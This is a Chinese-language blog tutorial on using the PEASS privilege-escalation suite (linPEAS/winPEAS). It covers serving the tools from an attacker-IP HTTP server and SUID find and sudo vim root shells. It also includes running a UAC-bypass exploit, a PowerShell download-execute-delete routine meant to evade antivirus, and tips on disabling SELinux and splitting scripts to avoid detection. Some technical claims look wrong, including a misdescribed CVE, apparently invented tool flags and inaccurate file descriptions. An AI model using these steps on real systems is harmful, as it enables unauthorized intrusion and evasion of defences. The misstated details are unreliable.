当前位置: 首页 > article >正文

PEASS使用教程

在Kali Linux的权限提升工具生态中PEASSPrivilege Escalation Awesome Scripts SUITE权限提升优秀脚本套件是一款覆盖Linux与Windows双平台的自动化权限提升扫描工具集。它通过整合LinpeasLinux平台与WinpeasWindows平台两大核心模块针对不同操作系统的权限配置缺陷、漏洞特征、敏感信息泄露等场景提供全面的扫描与攻击路径识别能力帮助渗透测试人员快速突破低权限限制获取目标系统的高权限访问。作为后渗透阶段的“瑞士军刀”PEASS凭借其跨平台兼容性、自动化分析能力与实时更新的漏洞库成为全球安全从业者的必备工具。本文将从工具概述、核心模块功能、目录结构解析、使用教程及注意事项等方面对PEASS进行全面详细的介绍。一、PEASS工具套件概述1. 工具定义PEASS是由开源社区开发的跨平台权限提升脚本套件核心定位是“Linux与Windows系统权限提升漏洞扫描与利用辅助工具集”。它包含两大独立模块LinpeasLinux Privilege Escalation Awesome Script专注于Linux系统WinpeasWindows Privilege Escalation Awesome Script专注于Windows系统。两大模块均采用“自动化扫描结构化报告”模式通过预定义的数百条检测规则覆盖权限提升的15核心场景如SUID文件滥用、sudo配置缺陷、Windows服务漏洞、注册表权限松动等并以高亮格式输出高危漏洞与利用建议大幅降低权限提升的技术门槛与时间成本。2. 开发背景与目标权限提升是渗透测试后渗透阶段的核心难点传统手动排查存在三大痛点一是“跨平台适配难”——Linux与Windows的权限机制、漏洞类型差异巨大需分别掌握不同的检测方法二是“场景覆盖不全”——手动排查易遗漏冷门场景如Linux的Docker权限滥用、Windows的UAC绕过三是“漏洞利用门槛高”——新型漏洞如内核漏洞、服务配置缺陷的利用方法需实时跟进普通测试人员难以快速掌握。PEASS的开发目标正是解决这些痛点通过整合双平台的权限提升脚本统一扫描逻辑与报告格式实时更新漏洞检测规则为测试人员提供“一站式、自动化、跨平台”的权限提升解决方案实现“一键扫描、直观定位、快速利用”的目标。3. 主要特点双平台全覆盖同时支持Linux与Windows系统Linpeas适配所有主流Linux发行版Ubuntu、CentOS、Debian、Kali及多架构x86、x86_64、arm、arm64Winpeas适配Windows 7至Windows 11及Windows Server 2008至2022覆盖95%以上的服务器与桌面操作系统环境。场景化深度扫描每个模块覆盖15核心权限提升场景Linpeas包含SUID/SGID文件滥用、sudo权限漏洞、内核漏洞、计划任务缺陷、Docker/K8s权限滥用等Winpeas包含Windows服务漏洞、UAC绕过、注册表权限松动、敏感文件泄露、令牌窃取等无明显场景盲区。自动化与智能化无需人工干预执行脚本后自动完成全维度扫描内置智能优先级排序高危漏洞标红、中危标黄、信息标蓝关键信息如可利用的SUID文件、Windows可写服务加粗显示同时标注漏洞利用难度与参考链接如Exploit-DB、MSDN文档引导测试人员快速利用。轻量与灵活部署所有脚本体积小巧Linpeas Shell脚本约50KBWinpeas可执行文件约2-5MB无需安装依赖库可通过wget、curl、文件上传等方式快速传输到目标系统支持“快速扫描”仅核心场景与“深度扫描”全场景漏洞验证模式适配不同网络环境与时间需求。实时更新漏洞库作为开源项目PEASS的漏洞检测规则与利用方法实时更新及时纳入新披露的权限提升漏洞如Linux的CVE-2023-0386、Windows的CVE-2022-21882确保对新型漏洞的检测能力避免因规则过时导致漏检。多格式报告输出支持文本、HTML、JSON等多种报告格式Linpeas可通过重定向输出文本报告Winpeas支持通过参数指定报告格式便于后续分析、团队分享与自动化集成如导入SIEM系统进行漏洞统计。4. 适用场景PEASS适用于Linux与Windows系统的渗透测试、安全评估、漏洞验证等场景具体包括以下核心场景后渗透权限提升获取目标系统低权限Shell如Linux的www-data、Windows的普通用户后执行PEASS扫描快速定位可提升至rootLinux或AdministratorWindows权限的漏洞实现权限突破。系统安全评估企业安全团队用于内部服务器与终端的权限安全评估检测权限配置缺陷如Linux的/etc/passwd可写、Windows的服务可篡改提前修复安全隐患降低被攻击风险。渗透测试教学与学习供安全初学者学习双平台权限提升的原理与方法如Linux的SUID文件利用逻辑、Windows的UAC机制通过扫描结果理解不同漏洞的触发条件与利用路径提升技术水平。多架构与特殊环境适配针对嵌入式Linux设备arm/arm64架构、老旧Windows系统Windows 7/Server 2008等特殊环境PEASS提供对应的脚本版本如Linpeas的arm架构二进制文件、Winpeas的x86可执行文件解决特殊环境的权限提升需求。二、PEASS目录结构中文翻译与说明在Kali Linux中PEASS的默认安装路径为/usr/share/peass目录分为LinpeasLinux模块与WinpeasWindows模块两大子目录每个子目录包含适配不同系统架构与环境的脚本/可执行文件。以下是完整目录结构的中文翻译及详细功能说明表格英文目录/文件名中文翻译功能说明与适用场景/usr/share/peassPEASS主目录PEASS工具套件的核心存储目录包含LinpeasLinux模块与WinpeasWindows模块两大子目录是双平台权限提升脚本的“统一入口”。/usr/share/peass/linpeasLinpeasLinux权限提升脚本子目录存放Linux平台的权限提升扫描脚本与可执行文件包含适配不同架构x86、x86_64、arm、arm64与环境的版本是PEASS在Linux系统的核心模块。linpeas/linpeas_darwin_amd64DarwinmacOSamd64架构可执行文件适用于macOS系统Darwin内核的amd64架构64位Intel处理器支持macOS 10.14版本实现macOS系统的权限提升扫描如检测 SIP 关闭状态、用户权限配置。linpeas/linpeas_darwin_arm64DarwinmacOSarm64架构可执行文件适用于macOS系统的arm64架构64位Apple Silicon处理器如M1、M2芯片解决新型macOS设备的权限提升扫描需求兼容macOS 12版本。linpeas/linpeas_fat.shLinpeas通用Shell脚本全功能版基于Bash编写的全功能Linux脚本兼容所有Linux架构无需区分x86/x86_64包含完整的扫描规则如内核漏洞匹配、Docker权限检测无需编译可直接在目标系统执行适合无法传输二进制文件的场景。linpeas/linpeas_linux_386Linux 386架构可执行文件适用于Linux系统的386架构32位x86处理器如老旧的32位Ubuntu、CentOS服务器二进制文件执行效率高于Shell脚本扫描速度提升30%以上。linpeas/linpeas_linux_amd64Linux amd64架构可执行文件适用于Linux系统的amd64架构64位x86处理器是目前主流Linux服务器阿里云、腾讯云、AWS EC2的默认架构支持所有高级扫描功能如实时内核漏洞匹配、SUID文件深度分析执行效率最高。linpeas/linpeas_linux_armLinux arm架构可执行文件适用于Linux系统的arm架构32位ARM处理器如嵌入式设备路由器、智能摄像头、ARM架构开发板树莓派早期32位版本解决嵌入式Linux的权限提升扫描需求。linpeas/linpeas_linux_arm64Linux arm64架构可执行文件适用于Linux系统的arm64架构64位ARM处理器如新型嵌入式设备、ARM架构云服务器AWS Graviton、阿里云ARM服务器适配64位ARM架构的高性能扫描需求支持ARMv8指令集。linpeas/linpeas.shLinpeas标准Shell脚本基于Bash编写的标准Linux脚本功能与linpeas_fat.sh一致但体积更小约50KB移除部分冷门场景检测如老旧内核漏洞适合网络带宽有限或需要快速传输的场景如目标系统仅允许小文件上传。linpeas/linpeas_small.shLinpeas轻量Shell脚本Linpeas的轻量级Linux脚本版本体积仅约10KB保留核心扫描规则SUID文件、sudo配置、可写系统文件移除彩色输出、内核漏洞匹配等高级功能适合目标系统环境受限的场景如Bash版本过低、禁止使用ANSI颜色代码。/usr/share/peass/winpeasWinpeasWindows权限提升脚本子目录存放Windows平台的权限提升扫描脚本与可执行文件包含适配不同位数x86、x64与环境普通用户、管理员的版本是PEASS在Windows系统的核心模块。winpeas/winPEASany.exeWinpeas通用可执行文件自适应位数支持Windows x86与x64架构的自适应可执行文件无需手动选择位数双击或通过命令行执行即可扫描覆盖Windows 7至Windows 11及Server 2008至2022是Windows环境的首选版本。winpeas/winPEASany_ofs.exeWinpeas通用可执行文件无文件落地版“无文件落地”版本的自适应可执行文件可通过内存加载方式执行如通过PowerShell远程注入不生成本地文件规避杀毒软件的文件哈希检测适合目标系统部署严格终端防护的场景。winpeas/winPEAS.batWinpeas批处理脚本基于Batch编写的Windows脚本兼容所有Windows版本包括Windows XP通过调用系统原生命令如sc、reg实现基础权限扫描如服务状态检测、注册表权限查看适合无法执行EXE文件的受限环境。winpeas/winPEAS.ps1Winpeas PowerShell脚本基于PowerShell编写的Windows脚本支持PowerShell 2.0至7.0版本通过PowerShell的高级功能如WMI查询、CIM对象实现深度扫描如进程令牌分析、UAC配置检测可通过powershell -ExecutionPolicy Bypass .\winPEAS.ps1绕过执行策略限制。winpeas/winPEASx64.exeWinpeas x64架构可执行文件专为Windows x64架构64位设计的可执行文件支持Windows 7 x64至Windows 11及Server 2008 R2至2022 x64版本执行效率高于自适应版本适合明确为64位的服务器环境。winpeas/winPEASx64_ofs.exeWinpeas x64架构可执行文件无文件落地版Windows x64架构的“无文件落地”版本通过内存加载执行不生成本地EXE文件规避杀毒软件与EDR终端检测响应的文件扫描适合高防护级别的Windows服务器环境。winpeas/winPEASx86.exeWinpeas x86架构可执行文件专为Windows x86架构32位设计的可执行文件支持Windows 7 x86至Windows 10 x86及Server 2008至2019 x86版本适配老旧的32位Windows终端与服务器。winpeas/winPEASx86_ofs.exeWinpeas x86架构可执行文件无文件落地版Windows x86架构的“无文件落地”版本支持32位Windows系统的内存加载执行适合老旧32位系统且防护严格的场景避免EXE文件被检测删除。三、PEASS完整使用教程PEASS的核心使用流程为“选择对应平台模块→传输到目标系统→执行扫描→分析结果→利用漏洞提权”以下分别针对LinuxLinpeas与WindowsWinpeas两大平台结合高频场景详细介绍使用步骤1. 基础环境准备Kali Linux默认预装PEASS套件无需额外安装。通过以下命令验证工具可用性并查看目录结构# 进入PEASS主目录 cd /usr/share/peass # 查看Linpeas与Winpeas子目录 ls -l # 输出linpeas与winpeas两个子目录说明资源完整 # 验证Linpeas脚本可执行性以Shell脚本为例 cd linpeas chmod x linpeas.sh # 赋予执行权限若未默认赋予 ./linpeas.sh -h # 查看帮助信息验证脚本正常可用 # 验证Winpeas可执行文件通过file命令查看文件类型 cd ../winpeas file winPEASany.exe # 输出PE32 executable (console) x86-64, for MS Windows说明文件正常若Kali未预装PEASS可通过以下命令安装sudo apt update sudo apt install peass或通过GitHub克隆最新版本获取实时更新的漏洞规则git clone https://github.com/carlospolop/PEASS-ng.git cd PEASS-ng ls -l # 查看linpeas与winpeas子目录获取最新版本文件2. 场景1Linux amd64服务器权限提升Linpeas使用目标获取目标Linux服务器amd64架构Ubuntu 22.04的低权限Shellwww-data用户通过Linpeas的amd64可执行文件扫描定位权限提升漏洞并提升至root权限。步骤1选择并传输Linpeas版本目标为amd64架构优先选择二进制可执行文件linpeas_linux_amd64执行效率高通过HTTP服务传输到目标系统# 1. 在Kali攻击机中进入Linpeas目录开启Python HTTP服务端口8080 cd /usr/share/peass/linpeas python3 -m http.server 8080 # 2. 在目标Linux系统的低权限Shell中使用wget下载Linpeas wget http://攻击机IP:8080/linpeas_linux_amd64 -O /tmp/linpeas # 保存到/tmp目录通常所有用户可写步骤2赋予执行权限并执行扫描在目标系统中赋予Linpeas执行权限执行深度扫描并输出报告# 进入/tmp目录赋予执行权限 cd /tmp chmod x linpeas # 执行深度扫描输出结果到文本报告便于后续分析 ./linpeas --deep linpeas_report.txt # --deep开启深度扫描模式扫描过程中终端会以彩色高亮格式输出实时结果高危漏洞标红、中危标黄扫描时间约2-5分钟取决于系统复杂度。步骤3分析扫描结果定位高危漏洞扫描完成后重点关注报告中标红的高危漏洞例如# 示例1发现具有SUID权限的find命令可用于提权 [!] SUID - Check easy privesc, exploits and write perms -rwsr-xr-x 1 root root 123456 Jul 10 2023 /usr/bin/find # find命令具有SUID权限支持-exec参数执行root命令 # 示例2发现sudo免密码执行vimwww-data用户可免密执行root权限的vim [!] Sudo - Check if sudo can be used without password www-data ALL(ALL) NOPASSWD: /usr/bin/vim # 免密执行vim可通过:!命令调用bash步骤4利用漏洞提升权限根据扫描结果选择对应的利用方法例如利用SUID find命令提权# 利用find的SUID权限执行bash获取root Shell find /tmp -name test -exec /bin/bash \; # 执行后进入root权限Shell # 验证权限 whoami # 输出root说明提权成功若发现sudo免密漏洞可通过以下方式提权# 免密执行vim通过:!命令调用bash sudo vim :!bash # 在vim中执行bash进入root Shell3. 场景2Windows 10终端权限提升Winpeas使用目标获取目标Windows 10终端的普通用户Shell通过Winpeas的通用可执行文件winPEASany.exe扫描定位UAC绕过漏洞并提升至Administrator权限。步骤1选择并传输Winpeas版本目标为Windows 10不确定位数选择自适应位数的winPEASany.exe通过SMB服务传输到目标系统# 1. 在Kali攻击机中开启SMB服务共享Winpeas文件 # 安装并配置Samba若未安装 sudo apt install samba sudo smbpasswd -a root # 添加SMB用户输入密码 sudo mkdir /smb_share # 创建共享目录 sudo cp /usr/share/peass/winpeas/winPEASany.exe /smb_share/ # 复制Winpeas到共享目录 sudo chmod 777 /smb_share/winPEASany.exe # 赋予读写权限 # 编辑Samba配置文件添加共享 sudo nano /etc/samba/smb.conf # 在文件末尾添加 [smb_share] path /smb_share writable yes guest ok yes public yes # 重启Samba服务 sudo systemctl restart smbd # 2. 在目标Windows系统中访问Kali的SMB共享下载Winpeas # 打开文件资源管理器输入路径 \\攻击机IP\smb_share # 复制winPEASany.exe到C:\Temp目录需提前创建Temp目录步骤2执行Winpeas扫描在目标Windows的命令提示符CMD或PowerShell中执行Winpeas扫描# 1. 打开CMD进入C:\Temp目录 cd C:\Temp # 2. 执行Winpeas输出结果到文本报告 winPEASany.exe winpeas_report.txt # 若提示权限不足添加--unelevated参数普通用户模式 # 或通过PowerShell执行绕过执行策略 powershell -ExecutionPolicy Bypass -Command .\winPEASany.exe winpeas_report.txt步骤3分析扫描结果定位UAC绕过漏洞扫描完成后查看报告中标红的UAC绕过或服务漏洞例如# 示例发现可利用的UAC绕过漏洞CVE-2021-40449 [!] UAC Bypass - Check for possible UAC bypass techniques [] Vulnerable to CVE-2021-40449 (MSHTML Remote Code Execution) - UAC bypass possible Exploit-DB: 50367 - https://www.exploit-db.com/exploits/50367 Requirements: User is in Administrators group (current user: test, group: Administrators)报告显示当前用户test属于Administrators组且系统存在CVE-2021-40449 UAC绕过漏洞。步骤4利用UAC绕过漏洞提权根据报告提供的Exploit-DB链接下载对应的漏洞利用代码在目标系统中执行# 1. 下载CVE-2021-40449利用工具假设已通过SMB传输到C:\Temp # 2. 在CMD中执行利用工具绕过UAC并获取Administrator权限Shell C:\Temp\CVE-2021-40449.exe cmd.exe # 调用cmd.exe获取高权限Shell # 验证权限 whoami # 输出nt authority\system或administrator说明提权成功4. 场景3Windows受限环境扫描Winpeas PowerShell脚本使用目标目标Windows系统禁止执行EXE文件仅允许PowerShell脚本通过Winpeas的PowerShell脚本winPEAS.ps1执行基础扫描。步骤1传输Winpeas PowerShell脚本通过PowerShell的Invoke-WebRequest命令直接从Kali攻击机下载脚本无需落地EXE文件# 在目标Windows的PowerShell中绕过执行策略并下载脚本 powershell -ExecutionPolicy Bypass -Command Invoke-WebRequest -Uri http://攻击机IP:8080/winPEAS.ps1 -OutFile C:\Temp\winPEAS.ps1步骤2执行PowerShell脚本扫描执行脚本输出精简报告适合受限环境# 执行脚本开启精简模式仅输出高危漏洞 powershell -ExecutionPolicy Bypass -Command C:\Temp\winPEAS.ps1 -quiet # -quiet精简模式脚本会快速扫描核心场景如服务权限、注册表松动输出标红的高危漏洞扫描时间约1-2分钟。5. 关键补充PEASS高级功能与优化技巧1Linpeas高级扫描选项Linpeas支持多种高级参数可根据需求调整扫描范围与输出格式# 1. 仅扫描指定场景如仅扫描SUID文件与sudo配置 ./linpeas --only suid,sudo # --only指定扫描场景 # 2. 禁用彩色输出适合目标系统不支持ANSI颜色 ./linpeas --nocolor report.txt # --nocolor禁用彩色 # 3. 输出JSON格式报告便于自动化分析 ./linpeas --json report.json # --jsonJSON格式输出 # 4. 排除指定漏洞检查如排除老旧内核漏洞 ./linpeas --exclude kernel_old # --exclude排除场景2Winpeas无文件落地执行规避杀毒软件针对防护严格的Windows系统使用“无文件落地”版本winPEASany_ofs.exe通过内存加载执行# 在Kali攻击机中开启HTTP服务提供winPEASany_ofs.exe cd /usr/share/peass/winpeas python3 -m http.server 8080 # 在目标Windows的PowerShell中通过内存加载执行不生成本地文件 powershell -ExecutionPolicy Bypass -Command $data Invoke-WebRequest -Uri http://攻击机IP:8080/winPEASany_ofs.exe -UseBasicParsing; $bytes $data.Content; [System.IO.File]::WriteAllBytes(C:\Users\Public\tmp.exe, $bytes); Start-Process C:\Users\Public\tmp.exe -NoNewWindow; Remove-Item C:\Users\Public\tmp.exe -Force该命令会临时生成EXE文件并立即执行执行后自动删除文件规避杀毒软件的文件扫描。3扫描结果筛选与快速定位通过命令快速筛选报告中的高危漏洞避免逐行查看# LinuxLinpeas筛选标红的高危漏洞包含[!]的行 grep -n \[!\] linpeas_report.txt # -n显示行号 # WindowsWinpeas在PowerShell中筛选高危漏洞 Get-Content winpeas_report.txt | Select-String -Pattern \[!\] # 筛选包含[!]的行四、使用PEASS的注意事项严格遵守合法授权PEASS是“高风险权限提升工具套件”仅可用于对“已获得明确书面授权”的系统进行测试。未经授权使用PEASS扫描他人系统、获取高权限可能违反《中华人民共和国网络安全法》《刑法》第285条非法侵入计算机信息系统罪、第286条破坏计算机信息系统罪将承担刑事责任禁止将PEASS用于攻击互联网上的非授权系统。区分测试环境与生产环境优先在“测试环境”如企业内部测试服务器、虚拟机中使用PEASS避免在“生产环境”如对外业务服务器、核心数据库中直接执行扫描——生产环境的权限提升操作可能导致服务中断、数据损坏如内核漏洞利用可能引发系统崩溃。若需测试生产环境必须提前与业务方沟通明确测试时间窗口如深夜低峰期、回滚方案如系统快照测试完成后立即清理扫描痕迹删除PEASS文件与报告恢复目标系统至正常状态。注意系统架构与版本兼容性Linpeas需匹配目标Linux系统的架构x86/x86_64/arm/arm64若架构不匹配可执行文件将无法运行提示“exec format error”此时需更换为对应架构的版本或使用Shell脚本版本如linpeas.sh。Winpeas需匹配目标Windows系统的位数x86/x64与版本例如Windows XP仅支持winPEAS.bat脚本Windows 11需使用最新版本的winPEASany.exe避免因版本过旧导致功能缺失。规避安全防护检测Linux系统中部分安全工具如SELinux、AppArmor可能限制PEASS的执行权限如禁止访问/proc目录需临时关闭防护或调整规则如setenforce 0关闭SELinux但需提前告知目标方。Windows系统中杀毒软件与EDR可能将Winpeas标记为“恶意程序”并删除可通过以下方式规避使用“无文件落地”版本如winPEASany_ofs.exe避免文件落地被扫描。通过PowerShell脚本版本winPEAS.ps1拆分脚本内容分段执行规避特征检测。禁止滥用与数据泄露仅在授权范围内执行与测试目的相关的操作不越权访问目标系统的敏感数据如用户密码、商业文档、数据库备份不执行破坏性命令如Linux的rm -rf /、Windows的format。PEASS报告包含目标系统的敏感信息如用户列表、权限配置、漏洞详情测试完成后需立即删除目标系统与攻击机中的报告副本避免信息泄露不得将报告用于测试以外的用途如出售、传播。定期更新PEASS版本权限提升漏洞持续披露如每月新增多个CVE漏洞需定期更新PEASS的漏洞检测规则确保对新型漏洞的检测能力# 通过GitHub更新最新版本 git clone https://github.com/carlospolop/PEASS-ng.git cd PEASS-ng/linpeas # 或winpeas目录获取最新文件关注PEASS官方GitHub仓库https://github.com/carlospolop/PEASS-ng及时获取新漏洞的检测规则与利用方法更新通知。五、总结PEASS作为跨平台权限提升的自动化工具套件凭借“双平台覆盖、场景化扫描、自动化分析”的核心优势成为渗透测试人员在后渗透阶段的必备工具。它通过Linpeas与Winpeas两大模块统一了Linux与Windows的权限提升扫描逻辑解决了传统手动排查“效率低、易遗漏、跨平台适配难”的痛点帮助测试人员快速突破低权限限制获取目标系统的完全控制。然而工具的强大功能也伴随着极高的法律与伦理风险。在使用PEASS时必须始终以“合法授权”为前提严格区分测试环境与生产环境避免对目标系统造成负面影响同时需深入理解双平台的权限机制与漏洞利用逻辑结合手动验证优化扫描结果确保权限提升的成功率与安全性。通过合理、合规地使用PEASS不仅能提升跨平台渗透测试的技术水平更能帮助企业认识权限配置的安全缺陷完善系统安全防护体系如Linux的SUID权限限制、Windows的UAC加固构建更安全的多平台运行环境。

相关文章:

PEASS使用教程

在Kali Linux的权限提升工具生态中,PEASS(Privilege Escalation Awesome Scripts SUITE,权限提升优秀脚本套件)是一款覆盖Linux与Windows双平台的自动化权限提升扫描工具集。它通过整合Linpeas(Linux平台)与…...

winpeas使用教程

winpeas是PEASS(Privilege Escalation Awesome Scripts SUITE,权限提升优秀脚本套件)中的Windows平台专用模块,全称为Windows Privilege Escalation Awesome Script。它是一款专为Windows系统设计的自动化权限提升扫描工具&#x…...

Lynis使用教程

在Kali Linux的系统安全审计工具库中,Lynis是一款开源、跨平台的自动化安全审计工具,核心定位是“Linux/Unix系统深度安全扫描与合规性检查工具”。它通过对系统内核、软件配置、用户权限、服务状态、日志策略等维度进行全面检测,识别潜在的安…...

全球近7.6万台WatchGuard Firebox设备暴露高危漏洞CVE-2025-9242,远程攻击者无需认证即可执行代码

全球约有7.6万台WatchGuard Firebox网络安全设备暴露在公网上,且尚未修复高危漏洞CVE-2025-9242。远程攻击者无需任何身份验证,即可利用该漏洞执行恶意代码,风险极高。 WatchGuard Firebox T145 Network Security/Firewall Appliance - WGT14…...

数电小白必看:最小项在逻辑函数中的神奇作用(附实例解析)

数电小白必看:最小项在逻辑函数中的神奇作用(附实例解析) 数字电路设计就像搭积木,而最小项就是其中最基础的"乐高颗粒"。想象一下,你正在设计一个智能家居控制系统——如何用最简洁的逻辑实现"当有人移…...

PCL Viewer隐藏功能揭秘:利用ALT组合键实现立体显示和窗口管理的进阶技巧

PCL Viewer隐藏功能揭秘:利用ALT组合键实现立体显示和窗口管理的进阶技巧 在三维点云数据处理领域,PCL Viewer作为Point Cloud Library的标准可视化工具,其基础功能已被广泛使用。然而,许多用户仅停留在简单的视图旋转和缩放操作上…...

LM1875功放DIY避坑指南:从看懂官方电路图到解决自激发热(附元件选择心得)

LM1875功放DIY实战手册:从电路设计到疑难排解全攻略 每次打开音响,那种温暖而有力的声音总能瞬间填满整个房间。作为DIY爱好者,亲手打造一台属于自己的功放不仅是技术的挑战,更是一种独特的成就感。LM1875这颗经典的音频功放芯片&…...

arcgis-利用融合与排序工具高效提取图斑面积最大属性值

1. 为什么需要提取图斑面积最大属性值 在GIS数据处理中,经常会遇到这样的需求:我们需要从复杂的图斑数据中找出每个区域占面积最大的属性值。比如在国土调查中,一个地块可能包含多种房屋质量等别,但我们需要确定该地块最主要的房…...

AI原生A/B测试框架设计实战(从LLM服务灰度到多模态策略归因):Meta/Netflix/阿里内部验证的7层隔离架构首次公开

第一章:AI原生A/B测试框架的核心范式演进 2026奇点智能技术大会(https://ml-summit.org) 传统A/B测试以静态页面与确定性分流为基石,而AI原生框架将实验设计、流量分配、指标归因与模型反馈深度耦合,形成闭环自适应系统。其核心范式从“假设…...

雨课堂英语听说期末考后复盘:那些容易丢分的听力填空长难句怎么破?(附2024.12真题片段分析)

破解英语听力填空长难句:从真题分析到精听实战 刚走出考场的你,是否对听力填空题里那些"听懂了却填不对"的长难句耿耿于怀?当录音中闪过"physicial active"、"two times as much water"这类复杂表达时&#xf…...

Arduino nRF5x低功耗库:深度解析SYSTEM_OFF与CONSTANT_LATENCY模式

1. 项目概述 Arduino nRF5x_lowPower 是专为 Nordic Semiconductor nRF5x 系列 SoC(如 nRF52832、nRF52840、nRF51822)设计的 Arduino 兼容低功耗管理库。它并非简单封装睡眠函数,而是深度对接 nRF5x 片上电源管理单元(PMU&…...

STM32 UDS Bootloader完整方案:简化学习ISO15765与ISO14429协...

uds bootloader stm32 完整方案 iso15765 iso14429 简化学习难度 需要可以加好友。 下载42k速度在15秒左右 第二版上位机:模仿vector vflash 设计简洁高效,下载速度提高到11k byte/s。01-firmware :包含stm32 boot 软件 设备驱动 应用程序 02-上位机 &#xf…...

如何告别网盘限速:八大平台直链下载助手完全指南

如何告别网盘限速:八大平台直链下载助手完全指南 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 ,支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼云盘 …...

磁珠在电源端必须加电容?一个容易被忽略的EMI设计细节与避坑指南

磁珠在电源端必须加电容?一个容易被忽略的EMI设计细节与避坑指南 在高速电路设计中,电磁干扰(EMI)问题往往成为工程师的噩梦。特别是当电路板上集成了Camera模块、RF收发器或其他敏感模拟电路时,电源线上的噪声就像隐形…...

Windows 系统 Allure 环境变量(PATH)配置完整教程

🔑 前置准备 先确认你已经下载并解压了 Allure 工具,找到它的 bin 目录路径(比如 D:\tools\allure-2.30.0\bin,路径里绝对不能有中文、空格、特殊符号) 确认 bin 目录里有 allure.bat 和 allure.exe 这两个文件 已经安装好 Java 8+ 环境(java -version 能正常输出版本号…...

pytest 在 main 函数中执行测试用例的 3 种常用方法

在 Python 脚本的 if __name__ == __main__: 主函数中调用 pytest,可以直接运行测试用例,无需手动敲命令行,非常适合 IDE 直接运行、自动化脚本集成。 下面给你最实用、可直接复制的写法: 方法 1:最简写法(执行当前文件所有用例) python 运行 import pytest# 测试用…...

pytest.ini 中 addopts 详解 多插件配置方法

addopts = --html=report.html --self-contained-html 一、addopts 到底是什么? addopts 是 pytest.ini 配置文件中 [pytest] 节下的核心配置项,全称是 additional options(附加选项)。它的作用是:把你每次执行 pytest 命令时都要手动加的命令行参数,永久写在配置文件里…...

pytest -mark

pytest.mark 是 pytest 核心功能,用于给测试函数 / 类打标签,实现分类、筛选、条件执行、参数化等。常用 @pytest.mark.xxx 装饰器 + 命令行 -m 筛选。 一、常用内置标记 1. skip /skipif:跳过测试 python 运行 import pytest import sys@pytest.mark.skip(reason="…...

SparkFun MetaWatch Arduino库深度解析:蓝牙SPP嵌入式控制

1. SparkFun MetaWatch Arduino库深度解析:蓝牙智能手表的嵌入式控制实践1.1 项目背景与工程定位MetaWatch 是2013年前后推出的早期开源智能手表平台,其核心价值在于完全开放的硬件设计与通信协议。SparkFun 推出的SFE_MetaWatchArduino 库并非通用蓝牙协…...

别再踩坑了!SQL Server数据类型那点事儿,看懂这篇少背三个锅没

从0构建WAV文件:读懂计算机文件的本质 虽然接触计算机有一段时间了,但是我的视野一直局限于一个较小的范围之内,往往只能看到于算法竞赛相关的内容,计算机各种文件在我看来十分复杂,认为构建他们并能达到目的是一件困难…...

ArduMotor:跨平台电机驱动抽象库设计与实现

1. ArduMotor库概述:面向Arduino与KL46Z平台的电机驱动抽象层ArduMotor是一个专为嵌入式电机控制设计的轻量级C库,核心目标是为Arduino兼容平台(如UNO、Nano)及NXP FRDM-KL46Z开发板提供统一、可移植的电机驱动接口。其底层硬件抽…...

ESP8266红外MQTT网关:基于Homie协议的轻量级IoT封装

1. 项目概述simple-homie-iot-ir是一个面向 ESP8266 平台(亦可适配 ESP32)的轻量级嵌入式 IoT 封装库,其核心定位并非从零实现 Homie 规范,而是作为homie-iotESP 库的简化抽象层,专为红外(IR)设…...

2026奇点智能技术大会前瞻(仅限首批参会者解密的8项AI-Native Data Stack技术白皮书)

第一章:2026奇点智能技术大会:AI原生大数据处理 2026奇点智能技术大会(https://ml-summit.org) 本届大会首次定义“AI原生大数据处理”范式——数据不再经由传统ETL管道预处理后喂给模型,而是以流式、语义化、向量化形态直接进入推理与训练…...

CISSP域3知识点 安全工程基础

🏗️ CISSP 域3安全工程基础丨把安全"建"进系统里Domain 3 安全架构与工程 OSG第十版第8章核心内容 占域3(13%总权重)30%以上,概念题场景题双高频 这一块是整个 CISSP 的理论地基,不搞透,后面很…...

效率神器!命令行终端优化(Zsh, iTerm2)

效率神器!命令行终端优化(Zsh, iTerm2) 对于开发者和技术爱好者来说,命令行终端是日常工作中不可或缺的工具。默认的终端配置往往功能有限,操作效率低下。通过优化终端环境,比如使用Zsh和iTerm2&#xff0…...

AI模型签名+SBOM+运行时策略绑定:SITS2026现场演示12分钟构建合规可信AI交付单元

第一章:SITS2026演讲:AI原生DevSecOps实践 2026奇点智能技术大会(https://ml-summit.org) 在SITS2026主会场,来自全球头部云原生安全团队的联合实践展示了如何将大语言模型(LLM)与策略即代码(Policy-as-C…...

避坑指南:在Ubuntu 20.04上编译安装GTSAM 4.2并运行因子图示例

深度避坑指南:Ubuntu 20.04下GTSAM 4.2编译安装与因子图实战全解析 当你在Ubuntu 20.04上尝试编译安装GTSAM 4.2时,是否遇到过Python绑定失败、CMake参数配置错误或是依赖版本冲突的困扰?作为机器人感知和SLAM领域的重要工具库,GT…...

从零开始:ArcGIS Pro二次开发环境搭建与首个模块加载项实战

1. 环境准备:从零搭建ArcGIS Pro开发环境 第一次接触ArcGIS Pro二次开发时,我花了整整两天时间才把环境配置好。现在回想起来,其实只要抓住几个关键点就能避开那些坑。首先需要确认的是软件版本匹配问题——这是新手最容易翻车的地方。根据我…...

终极指南:如何用VR-Reversal免费将3D视频转为2D播放

终极指南:如何用VR-Reversal免费将3D视频转为2D播放 【免费下载链接】VR-reversal VR-Reversal - Player for conversion of 3D video to 2D with optional saving of head tracking data and rendering out of 2D copies. 项目地址: https://gitcode.com/gh_mirr…...

C#索引器练习题

索引器是一种特殊的属性,允许类或结构的实例像数组一样通过索引进行访问。它提供了使用 [] 运算符访问对象中元素集合的便捷方式。一、考察索引器的定义与使用 难度:⭐定义一个 StudentClass 班级类,该类中包含一个集合用于存储学生姓名。…...